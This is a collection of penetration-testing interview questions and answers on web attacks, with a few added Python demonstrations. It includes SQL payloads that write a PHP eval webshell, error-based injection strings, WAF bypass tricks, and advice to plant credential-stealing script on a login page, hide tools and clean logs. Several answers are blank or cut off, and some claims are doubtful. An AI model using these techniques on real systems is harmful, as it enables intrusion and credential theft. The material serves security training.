Collection of Penetration Testing Interview Questions

1. Overall approach

1. Information gathering

a. Server information (real IP, OS type and version, open ports, WAF, etc.)

b. Website fingerprinting (CMS, CDN, TLS certificate, etc.) and DNS records

c. Whois information: registrant name, registration record, e-mail and phone number, with reverse lookups on each (if the e-mail shows up in a leaked-credential database, prepare for social engineering, etc.)

d. Subdomain enumeration, other sites on the same host, the surrounding /24 (C class) range, etc.

e. Targeted Google hacking: PDF files, middleware versions, weak-password scanning, etc.

f. Directory scanning for leaked sensitive files: the admin backend, server banner, test files, backups, etc.

g. Transport protocol, known vulnerabilities and public exploits, source code on GitHub, etc.

2. Vulnerability discovery

a. Browse the site to gauge its size, functions and features.

b. Scan ports, weak passwords, directories, etc., and run vulnerability checks against the services that respond: rsync, Heartbleed, MySQL, FTP, SSH weak passwords, etc.

c. XSS, SQL injection, file upload, command injection, CSRF, cookie security, sensitive information disclosure, transport security, brute forcing, arbitrary file upload, unauthenticated and unauthorized access, directory traversal, file inclusion, replay attacks (e.g. SMS bombing), server-side vulnerability checks, and finally an automated vulnerability scanner.

3. Exploitation and privilege escalation

a. MySQL, Serv-U and Oracle privilege escalation

b. Windows memory-corruption (overflow) privilege escalation

c. Linux Dirty COW and other kernel privilege escalation

4. Clean up test data and write the report

Clean up logs and test artifacts, summarize the test data, write the penetration test report, and attach a remediation plan.

5. Retest

Verify the fixes, check whether new vulnerabilities were introduced, write the retest report, and archive.

2. Questions

1. You are given a site to test. What do you do first?

Information gathering:
a. Get the domain's whois information (registrant e-mail, name, phone number, etc.) and check it against leaked-credential databases; try any leaked passwords on the backend login. Search for the e-mail address to find other addresses and the administrator's social accounts, which may reveal password habits. Build a targeted wordlist from everything collected.

b. Enumerate other sites on the same server and subdomains. The main site is usually the hardest, so first check whether the neighbouring sites run a common CMS or have other known vulnerabilities.

c. Identify the server OS version and web middleware and check for known vulnerabilities, such as the IIS, Apache and Nginx file-parsing vulnerabilities.

d. Find the real IP, port-scan it, and run vulnerability checks against the services that respond: rsync, Heartbleed, MySQL, FTP, SSH weak passwords, etc.

e. Scan the directory structure for directory listing and leaked sensitive files, such as a PHP probe page.

f. Use Google hacking to find more site information, the admin backend and sensitive files.

Vulnerability scanning:
Test for XSS, CSRF, SQL injection, code execution, command execution, unauthorized access, directory listing, arbitrary file read and download, file inclusion, remote command execution, weak passwords, file upload, editor vulnerabilities, brute forcing, etc.

Exploitation:
Use the findings above to obtain a webshell or other access.

Privilege escalation:
On Windows: MySQL UDF escalation, Serv-U escalation, and local exploits for older Windows versions (e.g. IIS 6 hosts, pr.exe, and Churrasco, the tool called "Brazilian barbecue" in Chinese write-ups). On Linux: Dirty COW, kernel version exploits, and escalation through a MySQL or Oracle instance running with low privileges.

Log cleanup

Summary report and remediation plan

2. Why does identifying the site's CMS matter for a penetration test?

You can look up vulnerabilities already published for that program.

If it is open source, you can also download the matching version of the source code for a code audit.

3. For a mature, relatively secure CMS, why still scan directories during a test?

To find sensitive files and second-level directories.

Webmaster mistakes, for example: archive files, a description .txt, and website backups; a second-level directory may also host a different (weaker) site.

4. Common web server containers.

IIS, Apache, Nginx, Lighttpd, Tomcat

5. Using a tool to write a one-line webshell straight to the target through a MySQL injection point: what conditions are required?

Root (or at least FILE) privileges for the database user, and the absolute path of the web root. On current MySQL versions secure_file_priv must also allow writing to that directory.

6. Which web server versions have known parsing vulnerabilities? Give specific examples.

a. IIS 6.0
/xx.asp/xx.jpg, where "xx.asp" is a directory name: everything under it is executed as ASP.

b. IIS 7.0/7.5 with FastCGI enabled (the default)
Appending /1.php to an image URL makes the server execute the image as PHP.

c. Nginx <= 0.8.37
Same technique as IIS 7.0/7.5; it also works with FastCGI disabled. Null-byte variant: xxx.jpg%00.php.

d. Apache
A file named test.php.x1.x2.x3 is parsed from right to left until a known extension is found, so it runs as PHP when x1, x2 and x3 are unrecognised extensions.

e. lighttpd
xx.jpg/xx.php. This list is incomplete; please feel free to add more in the comments, thank you!

7. How do you quickly determine by hand whether the target runs Windows or Linux?

Linux file systems are case sensitive and Windows is not: change the case of a letter in the path (e.g. index.php to Index.php). If the page still loads, the server is Windows.

8. Why might a site backed by MySQL show only port 80 open?

The MySQL port was changed and the scan missed it.

The web server and the database server are separate hosts (site/database separation).

Port 3306 is not reachable from the public network (firewalled or bound to localhost).

9. Several reasons why you cannot connect to 3389

Port 3389 is not open.
The port has been changed.
A firewall or protection software intercepts the connection.
The host is on an internal network (port forwarding is required).

10. How do you get around characters being escaped during injection?

Wide-byte injection
Hex encoding to avoid needing quotes

11. You see a rich-text editor in the backend news editing page. What do you do first?

Identify the editor's name and version and search for published vulnerabilities.

12. You have a webshell and find an .htaccess file in the web root. What can you do with it?

Many things. Taking a hidden webshell as an example, insert:

<FilesMatch "xxx.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

and xxx.jpg will be executed as PHP (this needs AllowOverride to permit .htaccess directives and mod_php to be in use).

I won't go into the other uses; search for the directives yourself and experiment.

13. Can an injection vulnerability only be used to read accounts and passwords?

As long as the database user's privileges are broad enough you can dump the entire database (拖库), not just the credentials table.

14. Will Safedog (安全狗) trace variables and detect a one-line webshell?

It is signature based, so it is easy to bypass with a little creativity. Signatures are updated, though, so no bypass should be treated as permanent.

15. Scanning finds an Access database file saved with an .asp suffix, and opening it in the browser returns garbage. How do you use it locally?

Download it with a download manager such as Xunlei (Thunder) and rename the suffix to .mdb.

16. When escalating privileges you need a readable and writable directory. Why avoid directories whose path contains spaces?

Because most exploits take their parameters on the command line and use spaces as delimiters; an unquoted path containing a space is split into two arguments.

17. A server hosts sites A and B. Why does a test user added in A's backend also appear in B's backend?

They share the same database.

18. When injecting, can I start directly with ORDER BY without first using and/or/xor?

Yes. The and 1=1 / and 1=2 steps only confirm that the parameter is injectable. Once that is established you can skip them.

19. During injection, an anti-injection system prompts:

The system has detected an illegal injection attempt.
Your IP xx.xx.xx.xx has been recorded
Time: 2016-01-23
Submitted page: test.asp?id=15
Submitted content: and 1=1

20. How can this anti-injection system be used to get a shell?

Submit a one-line webshell in the URL so that the system records it into its log database file. Then find that file's path (for example from the site's configuration file) and, if it sits under the web root with an executable extension, connect to it with China Chopper.

21. After uploading a large webshell (大马), the page shows garbled characters. What are the solutions?

Switch the page encoding in the browser.

22. What is the point of inspecting the element of an upload form?

Some sites enforce the allowed file types only on the front end (in JavaScript). In that case adding the wanted type to the client-side check, or removing the check, is enough to bypass the restriction.

23. The target site has registration disabled. On the password reset page, entering a user name yields "This user does not exist." How can this be used?

First enumerate valid user names through that message, then brute force the passwords of the accounts found.
Some sites leak the same information at the login form.
Any place that interacts with the database may also be injectable.

24. On the target site you find that a .txt file is downloaded through

http://www.test.com/down/down.php?file=/upwdown/1.txt. What are your ideas?

This is the classic arbitrary file download vulnerability. Try file=index.php to download the homepage source, then follow the includes in it to the site's configuration files, which give you the database address and password.
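The check that a script like down.php is missing, as an added example in Python (not code from the original page). The web root /var/www/html, the download directory /var/www/html/upwdown and the allowed extensions are assumptions for the example; vulnerable_resolve() models a script that glues the file= parameter onto the web root, and resolve_download() is the hardened version that keeps reads inside one directory.

```python
import os
from typing import Optional

# Assumptions for this example: the web root and the one directory the
# download script is allowed to serve from.
WEB_ROOT = "/var/www/html"
DOWNLOAD_DIR = "/var/www/html/upwdown"
ALLOWED_EXT = {".txt", ".pdf", ".zip"}


def vulnerable_resolve(requested: str, web_root: str = WEB_ROOT) -> str:
    """What a script like down.php?file=... typically does: glue the parameter
    onto the web root and read whatever that points at. index.php,
    /upwdown/../config.php and ../../../etc/passwd are all accepted."""
    return os.path.normpath(f"{web_root}/{requested}")


def resolve_download(requested: str, web_root: str = WEB_ROOT,
                     download_dir: str = DOWNLOAD_DIR) -> Optional[str]:
    """Same mapping, but the result must (1) still be inside download_dir after
    normalisation and (2) carry an allowed extension. Returns None when the
    request must be refused."""
    base = os.path.realpath(download_dir)
    full = os.path.realpath(f"{web_root}/{requested}")
    # realpath() collapses ../ sequences and symlinks. Compare on path
    # components, not on the raw string prefix, so that /upwdown-private
    # is not mistaken for a child of /upwdown.
    if os.path.commonpath([base, full]) != base:
        return None
    if os.path.splitext(full)[1].lower() not in ALLOWED_EXT:
        return None
    return full


if __name__ == "__main__":
    for f in ("/upwdown/1.txt", "index.php", "/upwdown/../index.php",
              "../../../etc/passwd", "/upwdown/shell.php"):
        print(f"{f:26} vulnerable -> {vulnerable_resolve(f)}")
        print(f"{'':26} checked    -> {resolve_download(f)}")
```

The extension allow-list is the second line of defence: even a request that stays inside the download directory must not hand back a .php source file that the same directory might contain.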

25. Someone gives you a target and tells you the web root contains /abc/, and that /abc/ contains the editor and admin directories. What are your thoughts?

Scan for sensitive files and directories directly under the second-level directory /abc/.

26. You already have a shell. How do you use XSS for long-term control of the target site?

Add a piece of JavaScript to the backend login page that records the submitted account and password and checks whether the login succeeded; on success it writes the credentials to a file at an obscure path or sends them to a site you control. (This suits valuable targets where deep, lasting access is needed.)

Insert XSS payloads into files that can only be reached after logging in.

27. On the backend "change administrator password" page the current password is shown as asterisks. How can you read it?

In the element inspector, change the input's type attribute from "password" to "text" and the plaintext is displayed (this only works when the server actually sent the password into the form field).

28. The target has no protection software. Uploaded images can be accessed normally, but accessing an uploaded script returns 403. Why?

There are many possible reasons. The web server may be configured so that the upload directory is not allowed to execute scripts, or the handler for that extension is disabled there. Try other extensions or a parsing vulnerability to bypass it.

29. How can inspecting the page reveal which protection software the site uses?

When a sensitive operation is intercepted and the block page does not name the product, press F12 and look at the HTML body: for example 护卫神 (Huweishen) leaves its name in the markup.

30. Why create a folder named .zhongzi on a Windows Server 2003 box?

To hide the folder so administrators do not find the tools you uploaded.

31. For SQL injection testing there are two candidate probes. Choose one and explain why not the other:

A. demo.jsp?id=2+1
B. demo.jsp?id=2-1

Choose B. In URL encoding, + is decoded as a space, so A arrives at the server as "2 1" and the result is ambiguous. 2-1 arrives unchanged, and if the page then shows the record for id=1, the parameter is being evaluated by the database.

32. The following link has a SQL injection vulnerability. How do you inject into this transformed parameter?

demo.do?DATA=AjAxNg==

DATA is probably base64 encoded before being passed to the server, so the injection payload also has to be base64 encoded for the test to reach the query correctly.

33. You found the injection point demo.jsp?uid=110. What approaches lead to a webshell, and which is best?

1) If the database user has file write privileges, use a UNION query with INTO OUTFILE to redirect the query output into a file under the web root, writing the webshell directly.
2) Use sqlmap --os-shell. The principle is the same as above, but it automates the process and is more efficient.
3) Extract the administrator's account and password with a UNION query, find the backend by scanning, log in, and upload a shell through the backend (modifying the request if the upload is filtered).

34. What is the difference between CSRF, XSS and XXE, and how are they fixed?

XSS (cross-site scripting): script is smuggled into user-submitted data and executed in other users' browsers, for example to steal their session. Fix: encode output as HTML entities, set HttpOnly on cookies so JavaScript cannot read them, validate input, and use the same character encoding in the browser and the web application.

CSRF (cross-site request forgery): the application performs a sensitive operation without confirming that the user intentionally initiated it. XSS is one of several ways to launch a CSRF attack. Fix: embed a token in the pages that need protection, require the password again for critical operations, and verify the Referer.

XXE (XML external entity injection): XML lets a document pull in local or remote content by referencing entities, similar to remote file inclusion, which leads to sensitive file reads and related issues. Fix: disable external entity resolution in the XML parser.

35. What is the difference between CSRF, SSRF and a replay attack?

CSRF is a cross-site request forgery: the forged request is sent by the victim's client. SSRF is a server-side request forgery: the attacker makes the server send the request. A replay attack resends intercepted packets, for example an authentication exchange, to reuse them.

36. Name at least three business logic vulnerabilities and how to fix them.

Password reset flaws:

1) The reset code can be brute forced.
2) A universal reset credential exists.
3) The verification step can be skipped.
4) The reset credential can be read from an intercepted response.

Any of these lets an attacker take over the account through the vendor's own password reset feature.

The most common authentication flaws are:

1) Session fixation
2) Cookie forgery

Whoever holds the session ID or cookie can impersonate the user.

CAPTCHA flaws:

1) The CAPTCHA can be brute forced.
2) The CAPTCHA can be bypassed through JavaScript or by modifying the request.

Fixes: rate-limit and expire reset codes and CAPTCHAs and bind them to the account and session; perform every verification step on the server; regenerate the session ID at login; and sign or randomise cookies so they cannot be forged.

37. Circle the items in the following request that may have problems and note what the problem could be.

GET /ecskins/demo.jsp?uid=2016031900&keyword="hello world" HTTP/1.1
Host: ***.com:82
User-Agent: Mozilla/5.0 Firefox/40
Accept: text/css,*/*;q=0.1
Accept-Language: zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer: http://*******.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902
Cookie: myguid1234567890=1349db5fe50c372c3d995709f54c273d; uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ; st_uid=N90PLYHLZGJXI-NX01VPUF46W; status=True
Connection: keep-alive


38. Given a website, how do you conduct a penetration test, assuming written authorization has been obtained?

39. sqlmap: how do you test an injection point?

1) GET parameter: sqlmap -u "<injection point URL>"
2) POST parameter: sqlmap -u "<injection point URL>" --data="<post parameters>"
3) If the injection point is in a cookie,

40. nmap, several methods of scanning

41. What are the types of SQL injection?

1) Error-based injection
2) Boolean-based blind injection
3) Time-based blind injection
4) Wide-byte injection

42. Which functions are used for error-based injection? (10)

1) extractvalue(): and extractvalue(1, concat(0x7e,(select @@version),0x7e))
2) floor(): the floor(rand(0)*2) group by duplicate-key error
3) updatexml(): and updatexml(1, concat(0x7e,(select @@version),0x7e),1)
4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10) exp(): select * from test where id=1 and exp(~(select * from

43. How do you detect time-based blind injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

If the response arrives about five seconds late, the condition was evaluated, so the parameter reaches the database.

44. What do boolean-based and time-based blind injection have in common?

Both recover data one character at a time from a yes/no signal.

45. How do you obtain a webshell on a website?

File upload, editing templates in the backend, SQL injection with file write, command execution, code execution, and published CMS-specific vulnerabilities, e.g. the DedeCMS backend can create script files directly, and WordPress accepts a plugin zip that contains a script file.

46. Which SQL statements write files for injection?

select '<one-line webshell>' into outfile '<path>'
select '<one-line webshell>' into dumpfile '<path>'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47. How do you prevent CSRF?

1) Verify the Referer
2) Verify a token
Details: http://cnodejs.org/topic/5533dd6e9138f09b629674fd

48. What are the OWASP Top 10 vulnerabilities (2013 list)?

1) Injection
2) Broken authentication and session management
3) Cross-site scripting (XSS)
4) Insecure direct object references
5) Security misconfiguration
6) Sensitive data exposure
7) Missing function-level access control
8) Cross-site request forgery (CSRF)
9) Using components with known vulnerabilities
10) Unvalidated redirects and forwards

49. SQL injection protection methods?

1) Use a safe (parameterised) API
2) Escape special characters in input
3) Validate input against a whitelist
4) Restrict client-side input and reject characters related to SQL injection
5) On the server, filter, escape, replace or delete special characters before the query is submitted to the database

50. Which PHP functions lead to code execution, file reading and command execution?

1) Code execution:

eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, create_function

2) File reading:

file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.

3) Command execution:

system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

51. Apart from the img tag's onerror attribute, is there another way to obtain the administrator's backend path?

Point src at a remote script on your server and read the Referer header it receives.

52. Apart from onerror, if the src attribute must end in .jpg, how do you obtain the administrator's path?

1) On your remote server, edit the Apache configuration so .jpg is handled as PHP (AddType application/x-httpd-php .jpg), then have that "image" log the Referer.

53. Why does an ASPX webshell get more privileges than an ASP one?

ASPX runs on .NET, which IIS does not support by default, while ASP is only a scripting language. In practice an ASP webshell usually runs with guest privileges, whereas an ASPX webshell usually runs with user privileges.

54. How do you bypass a WAF?

Case variation
Inline comment interference (/*!...*/)
Encoding: base64, unicode, hex, URL, ASCII
Complex or obfuscated parameters

55. How do you write a webshell to the server?

Upload vulnerabilities of all kinds
MySQL with file write privileges: write the shell with a SQL statement
HTTP PUT method

56. Common ports in penetration testing

a. Web services (web vulnerabilities / sensitive directories); common third-party component vulnerabilities: Struts, ThinkPHP, JBoss, Ganglia, Zabbix

80 web
80-89 web
8000-9090 web

b. Databases (weak-password scanning)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

c. Special services (unauthenticated access / command execution / known vulnerabilities)

443 SSL: Heartbleed
873 rsync: unauthenticated access
5984 CouchDB: http://xxx:5984/_utils/
6379 Redis: unauthenticated access
7001, 7002 WebLogic: default weak passwords, deserialization
9200, 9300 Elasticsearch: see WooYun "ElasticSearch command execution vulnerability on a certain server"
11211 Memcached: unauthenticated access
27017, 27018 MongoDB: unauthenticated access
50000 SAP: command execution
50070, 50030 Hadoop: default ports, unauthenticated access

d. Common services (weak-password scanning / port brute forcing)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra routing, default password zebra
3389 remote desktop

Full port list

21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL: Heartbleed, plus general web vulnerability testing
445 SMB
512, 513, 514 rexec / rlogin / rsh
873 Rsync unauthorized
111, 1025 NFS / portmapper
1433 MSSQL
1521 Oracle (iSQL*Plus ports: 5560, 7778)
2082/2083 cpanel host management system login (more used abroad)
2222 DA virtual host management system login (more used abroad)
2601,2604 zebra routing, default password zebra
3128 Squid proxy default port; with no password set it can be used to pivot straight into the intranet
3306 MySQL
3312/3311 kangle host management system login
3389 Remote desktop
4440 rundeck Reference WooYun: Borrowing a Sina service to successfully roam the Sina intranet
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 Varnish: see WooYun "Varnish HTTP accelerator CLI unauthorized access can easily lead to direct tampering of the website or using it as a proxy into the intranet"
6379 Redis: unauthenticated access
7001, 7002 WebLogic: default weak passwords, deserialization
7778 Kloxo host control panel login
8000-9090: common alternative web ports; some operations teams put the management backend on these non-80 ports
8080 Tomcat / WDCP host management system, default weak passwords
8080, 8089, 9090 JBoss
8083 Vestacp host management system (more used abroad)
8649 ganglia
8888 amh/LuManager host management system default port
9200, 9300 Elasticsearch: see WooYun "ElasticSearch command execution vulnerability on a certain Duowan server"
10000 Virtualmin/Webmin server virtual host management system
11211 memcache unauthorized access
27017, 27018 Mongodb unauthorized access
28017 mongodb statistics page
50000 SAP command execution
50070, 50030 hadoop default port unauthorized access

3. Questions from a certain security vendor

Which vulnerability classes do you know?

What protections exist for file upload?

What do you use to scan ports and directories?

How do you identify SQL injection?

What do you do when the injection point is protected?

Have you written a sqlmap tamper script?

What are ports 3306, 1433 and 8080?

Computer networking from the physical layer to the application layer

Do you have web service development experience?

How do you write a webshell to a server?

Have you used an XSS platform?

The process of a web penetration test

Two MySQL privilege escalation methods (UDF, ?)

Common encryption methods

How to defend against DDoS

Have you captured packets? Can you write Wireshark filter rules?

Which logs need to be cleaned?

4. SQL injection protection

1. Use a safe (parameterised) API
2. Escape special characters in input
3. Validate input against a whitelist
4. Restrict client-side input and reject characters related to SQL injection
5. On the server, filter, escape, replace or delete special characters before the query is submitted to the database
6. Use a consistent encoding and character set

5. Why do parameterised queries prevent SQL injection?

Principle:

With a parameterised query the database server never treats the parameter content as part of the SQL statement. The statement is compiled first, and the parameter values are applied afterwards.

Put simply: the statement is the statement and the parameters are the parameters. A parameter value is never part of the statement text, so the database runs only what the statement's semantics say, whatever the value contains.

6. SQL injection points in HTTP headers

User-Agent
Referer
Cookie
Client IP (e.g. X-Forwarded-For, when the application stores it)

7. What is blind injection? How do you perform it?

Blind injection is SQL injection against a server that has turned off error output, so both the existence of injection and the data itself must be inferred from changes in the server's response. There are two methods. Boolean-based: judge from whether the page returns its "correct" content. Time-based: judge from how long the query takes, using delay functions such as sleep() or benchmark(), or a join that produces a large Cartesian product to cause the delay.
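An added example (Python, not code from the original page) of the character-by-character extraction loop described here and in questions 43 and 44. An in-memory SQLite table with invented rows stands in for the target database, and the "page looks normal" signal is simulated by a function that concatenates the parameter into its query; against a real target the oracle would be an HTTP request, and for time-based blind injection only the oracle changes.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample backend: an in-memory SQLite database standing in
    for the target's MySQL. Table and rows are invented for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cretPa55')")
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest')")
    return conn


def vulnerable_page(conn: sqlite3.Connection, uid: str) -> bool:
    """Stand-in for demo.jsp?uid=...: the parameter is concatenated into the
    query (the bug) and the caller only learns whether a row came back, which
    is all a boolean-blind attacker gets from the page."""
    sql = f"SELECT username FROM users WHERE id={uid}"
    return conn.execute(sql).fetchone() is not None


class BlindExtractor:
    """Recovers query results one character at a time through a true/false
    oracle. For the time-based variant only oracle() changes: it would send
    if(<cond>,sleep(5),1) and compare response times instead."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0

    def oracle(self, condition: str) -> bool:
        self.requests += 1
        return vulnerable_page(self.conn, f"1 AND ({condition})")

    def leak_int(self, expr: str, lo: int = 0, hi: int = 255) -> int:
        # Binary search on the value: about log2(hi - lo) requests instead of
        # one request per candidate value.
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def leak_string(self, subquery: str) -> str:
        # Length first, then each character's code point. MySQL would use
        # ascii(substr(...)); SQLite's equivalent is unicode(substr(...)).
        length = self.leak_int(f"length(({subquery}))")
        return "".join(
            chr(self.leak_int(f"unicode(substr(({subquery}),{pos},1))", 0, 127))
            for pos in range(1, length + 1)
        )


if __name__ == "__main__":
    db = build_db()
    ext = BlindExtractor(db)
    secret = ext.leak_string("SELECT password FROM users WHERE username='admin'")
    print(f"{secret!r} recovered in {ext.requests} requests")
```

The request count is the figure that matters in practice: a ten-character value costs roughly 8 + 10 x 7 oracle queries with binary search, versus up to 95 per character with a linear scan, which is why both sqlmap and hand-written scripts bisect on the character code.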

8. Principle and root cause of wide-byte injection

1. How it arises

The database uses a multi-byte character set (such as GBK) and the web layer does not take this into account. Take PHP with addslashes() or magic_quotes_gpc on: the input bytes 0xBF27 are two separate bytes to the web layer, the single quote 0x27 is escaped, and 0xBF27 becomes 0xBF5C27. When that reaches the database, 0xBF5C is decoded as one GBK character, so the backslash is "eaten" by the preceding 0xBF and the single quote is free again to close the string.

2. Where the encoding happens

3. Root cause

character_set_client (the client's character set) and character_set_connection (the connection's character set) differ, or conversion functions such as iconv and mb_convert_encoding are used incorrectly.

4. Fix

Use one character set consistently across the database, web application and operating system to avoid differences in parsing; UTF-8 is the best choice. Otherwise escape the data correctly for the connection charset, e.g. mysql_set_charset() followed by mysql_real_escape_string(), or, better, use parameterised queries.
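An added byte-level demonstration of the 0xBF27 to 0xBF5C27 sequence described above (Python, not code from the original page). php_addslashes() is a simplified model of PHP's behaviour rather than PHP's own code, and the attacker input is constructed; the second function decodes the escaped bytes the way a GBK or UTF-8 connection would and reports whether the quote is still escaped afterwards.

```python
def php_addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP's addslashes()/magic_quotes_gpc: put a
    backslash (0x5C) before ' " \\ and NUL. It never looks at which character
    set the bytes are in, which is exactly the problem."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_still_escaped(escaped: bytes, connection_charset: str) -> bool:
    """Decode the escaped bytes the way the database will (with the
    connection character set) and report whether every single quote is still
    preceded by a backslash *character* after decoding. False means the
    quote is live and can close the string."""
    text = escaped.decode(connection_charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return False
    return True


def show(payload: bytes, charset: str) -> str:
    escaped = php_addslashes(payload)
    return (f"{charset:6} {escaped.hex(' ')} -> "
            f"{escaped.decode(charset, errors='replace')!r} "
            f"quote escaped: {quote_still_escaped(escaped, charset)}")


if __name__ == "__main__":
    # Constructed attacker input: a lone GBK lead byte followed by the quote.
    payload = b"\xbf' or 1=1 -- "
    print(show(payload, "gbk"))    # 0xBF 0x5C swallowed as one character
    print(show(payload, "utf-8"))  # 0xBF is invalid alone; backslash survives
```

Under GBK the 0xBF5C pair decodes to a single ideograph and the quote that follows is unescaped; under UTF-8 the stray 0xBF cannot combine with 0x5C, so the backslash keeps protecting the quote. That is the whole reason the fix is to make the escaping routine aware of the connection charset or to use parameterised queries.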

5. How do you exploit injection when the only statement is an UPDATE?

First understand this SQL:

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

Each of the following modifications turns it into an injection.

a. Set the homepage value to http://xxx.net', userlevel='3

The statement becomes

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel is the user's privilege level, so the attacker has promoted their own account.

b. Set the password value to mypass)' WHERE username='admin'#

The statement becomes

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

Everything after # is a comment, so the admin password is overwritten.

c. Set the id value to ' OR username='admin' and the statement becomes

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
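An added example (Python with SQLite, not code from the original page) that runs cases a and c above against a constructed user table, then sends the same payloads through a parameterised statement, the protection explained in section 5 ("Why parameterised queries prevent SQL injection"). The table layout and rows are assumptions; MD5 is computed in Python because SQLite has no MD5() function.

```python
import hashlib
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample `user` table (in-memory SQLite stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id TEXT, username TEXT, password TEXT, "
                 "homepage TEXT, userlevel TEXT)")
    conn.executemany("INSERT INTO user VALUES (?,?,?,?,?)", [
        ("7", "bob", "", "", "1"),
        ("1", "admin", "", "", "3"),
    ])
    return conn


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def update_profile_vulnerable(conn, uid: str, password: str, homepage: str) -> str:
    """The page's UPDATE built by string concatenation. Returns the SQL that
    actually ran so the effect of each payload is visible."""
    sql = (f"UPDATE user SET password='{md5(password)}', "
           f"homepage='{homepage}' WHERE id='{uid}'")
    conn.execute(sql)
    return sql


def update_profile_safe(conn, uid: str, password: str, homepage: str) -> None:
    """Parameterised form: the statement is compiled with three placeholders
    and the values are bound afterwards, so a quote inside homepage or uid is
    stored as data and can never add a column or rewrite the WHERE clause."""
    conn.execute("UPDATE user SET password=?, homepage=? WHERE id=?",
                 (md5(password), homepage, uid))


def row(conn, username: str) -> dict:
    cur = conn.execute("SELECT id, password, homepage, userlevel FROM user "
                       "WHERE username=?", (username,))
    cols = [c[0] for c in cur.description]
    return dict(zip(cols, cur.fetchone()))


if __name__ == "__main__":
    db = build_db()
    # Case a: bob raises his own userlevel through the homepage field.
    print(update_profile_vulnerable(db, "7", "pw", "http://xxx.net', userlevel='3"))
    print(row(db, "bob"))
    # Case c: the id field rewrites the WHERE clause and resets admin's password.
    print(update_profile_vulnerable(db, "' OR username='admin", "mypass", "x"))
    print(row(db, "admin"))
    # The same payloads through the parameterised statement are inert.
    db = build_db()
    update_profile_safe(db, "7", "pw", "http://xxx.net', userlevel='3")
    update_profile_safe(db, "' OR username='admin", "mypass", "x")
    print(row(db, "bob"), row(db, "admin"))
```

With the parameterised statement the homepage column ends up containing the literal text http://xxx.net', userlevel='3 and the admin row is untouched, because no row has the id "' OR username='admin".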

9. How do you write a shell through SQL injection? What if the single quote is filtered?

Writing a shell needs: root (or FILE) privileges, magic_quotes_gpc off so the quotes survive, the absolute path of the web root, and INTO OUTFILE/DUMPFILE not blocked by secure_file_priv.

http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'
http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'

If the single quote is filtered: wide-byte injection, or express string values in hex (as the second URL above does) so that no quote is needed.

1. What can replace spaces?

%0a, %0b, %a0 and other whitespace characters
/**/ and other comment sequences
<>

2. In MySQL injection, what is the difference between versions 5.0 and above and those below 5.0?

Below 5.0 there is no information_schema system database, so table and column names cannot be enumerated and must be guessed by brute force.

Below 5.0 is described as multi-user, single-operation; 5.0 and above as multi-user, multi-operation.

10. XSS

1. XSS principle

Reflected

Script can be placed in user-submitted data and executed when the server reflects it back, enabling attacks such as stealing user information. The victim must be tricked into opening a malicious link for the attack to succeed.

Stored

Stored XSS saves the user's input on the server side, so it fires for every visitor; this kind of XSS is highly persistent.

DOM-based

XSS caused by client-side code modifying the page's DOM nodes is called DOM-based XSS.

2. The difference between DOM-based and reflected XSS

Reflected XSS is triggered by luring a user to open a link carrying our malicious payload, and every time we request the link with the payload, the response body contains the specific malformed data. DOM-based XSS is produced by JavaScript's own DOM operations, so the malformed data may not appear in the HTTP response at all. In my view the fundamental difference is the output point: the server's response versus the client's DOM.

3. Automated or manual testing of DOM-based XSS

